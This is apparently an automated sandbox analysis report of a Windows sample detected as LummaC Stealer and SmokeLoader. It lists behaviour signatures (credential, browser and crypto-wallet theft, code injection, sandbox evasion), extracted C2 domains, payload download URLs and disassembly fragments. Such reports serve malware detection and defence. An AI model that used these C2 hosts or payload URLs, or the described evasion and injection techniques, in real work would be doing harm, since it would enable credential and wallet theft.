Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1483386
MD5: 94267a284d656590e74246749da7f91c
SHA1: bccb3bd1483e50641862412e152dc5c7b590f4e8
SHA256: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd
Tags: exe
Infos:

Detection

LummaC, Go Injector, LummaC Stealer, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Check for Windows Defender sandbox
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Go Injector
Yara detected LummaC Stealer
Yara detected SmokeLoader
AI detected suspicious sample
Allocates memory in foreign processes
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Changes memory attributes in foreign processes to executable or writable
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious ZIP file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Reads the Security eventlog
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SIDT)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
SmokeLoader The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
 https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: https://callosallsaospz.shop/api Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apicnmamaa Avira URL Cloud: Label: malware
Source: lariatedzugspd.shop Avira URL Cloud: Label: malware
Source: callosallsaospz.shop Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/bO Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/e Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/b Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apioro Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/m Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/h Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/i Avira URL Cloud: Label: malware
Source: https://funrecipebooks.com/setups.exe Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/o Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/D Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apiQbd Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apisF Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apiem Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/// Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/apiyy Avira URL Cloud: Label: malware
Source: https://mussangroup.com/wp-content/images/pic1.jpg Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/ Avira URL Cloud: Label: malware
Source: https://callosallsaospz.shop/0 Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\sashibt Avira: detection malicious, Label: HEUR/AGEN.1312596
Found malware configuration
Source: 00000007.00000002.2706568336.0000000002600000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}
Source: 7C81.exe.5268.10.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "bOKHNM--"}
Multi AV Scanner detection for domain / URL
Source: liernessfornicsa.shop Virustotal: Detection: 19% Perma Link
Source: mussangroup.com Virustotal: Detection: 13% Perma Link
Source: callosallsaospz.shop Virustotal: Detection: 19% Perma Link
Source: https://callosallsaospz.shop/api Virustotal: Detection: 22% Perma Link
Source: lariatedzugspd.shop Virustotal: Detection: 19% Perma Link
Source: callosallsaospz.shop Virustotal: Detection: 19% Perma Link
Source: liernessfornicsa.shop Virustotal: Detection: 19% Perma Link
Source: https://callosallsaospz.shop/i Virustotal: Detection: 17% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\3530.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\7C81.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\sashibt ReversingLabs: Detection: 50%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 50%
Source: file.exe Virustotal: Detection: 42% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\3530.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\sashibt Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: indexterityszcoxp.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: lariatedzugspd.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: callosallsaospz.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: outpointsozp.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: liernessfornicsa.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: upknittsoappz.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: shepherdlyopzc.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: unseaffarignsk.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: callosallsaospz.shop
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp String decryptor: bOKHNM--
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 14_2_004D7A10 CryptUnprotectData, 14_2_004D7A10
Source: 3530.exe, 00000008.00000003.2795754457.000001B962AE1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_f5cb06df-e
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.5:51812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.235.84:443 -> 192.168.2.5:51821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51832 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.5:51837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51841 version: TLS 1.2
Source: unknown HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.5:51842 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51843 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51846 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51847 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:51848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51849 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51851 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51854 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51856 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51860 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51861 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51862 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51863 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51864 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51865 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51866 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51867 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51869 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51870 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51871 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51872 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51873 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51874 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51875 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51876 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51879 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51880 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51881 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51882 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51883 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51886 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51888 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51889 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51890 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51891 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51892 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51894 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51896 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51897 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51898 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51899 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51900 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51902 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51903 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51904 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51905 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51906 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51907 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51909 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51910 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51911 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51912 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51913 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51915 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51916 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51917 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51918 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51921 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51922 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51923 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51924 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:51926 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:51927 version: TLS 1.2
Source: unknown HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:51928 version: TLS 1.2
Source: Binary string: BitLockerToGo.pdb source: 7C81.exe, 0000000A.00000003.2938083888.0000022AE3FC0000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000003.2937937512.0000022AE4000000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956327407.000000C000480000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000966000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: 7C81.exe, 0000000A.00000003.2938083888.0000022AE3FC0000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000003.2937937512.0000022AE4000000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956327407.000000C000480000.00000004.00001000.00020000.00000000.sdmp, 7C81.exe, 0000000A.00000002.2956812619.000000C000966000.00000004.00001000.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+50h] 14_2_004D91C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+54h] 14_2_004D7189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 14_2_004D7189
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [edi+0Ch] 14_2_004C3260
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+54h] 14_2_004D72DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 14_2_004D72DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 14_2_004FA479
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, dword ptr [esp] 14_2_004F9C20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then push eax 14_2_004F3CD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, dword ptr [esp+30h] 14_2_004CFCB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edx, dword ptr [esp+00000200h] 14_2_004CFCB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp+10h] 14_2_004D6CB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+70h] 14_2_004D7DEB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h 14_2_004D7DEB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+10h] 14_2_004D3DE6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 14_2_004D2E51
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp] 14_2_004F7E80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+00000820h] 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esi+1Ch] 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+50h] 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 14_2_004FB840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 14_2_004FB840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [ecx], ax 14_2_004D5871
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 14_2_004CA000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h 14_2_004DD810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ebx, eax 14_2_004C38D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+10h] 14_2_004D30F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [ecx], 00000000h 14_2_004D30F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+00000820h] 14_2_004E788A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 00D23749h 14_2_004DE086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 14_2_004DE086
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 14_2_004F8880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+00000820h] 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esi+1Ch] 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+50h] 14_2_004E6F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, word ptr [ebx+eax*4] 14_2_004C8960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ecx, dword ptr [esp] 14_2_004C8960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp ecx 14_2_004FB160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov edi, eax 14_2_004FB160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp eax 14_2_004FB160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 14_2_004DB920
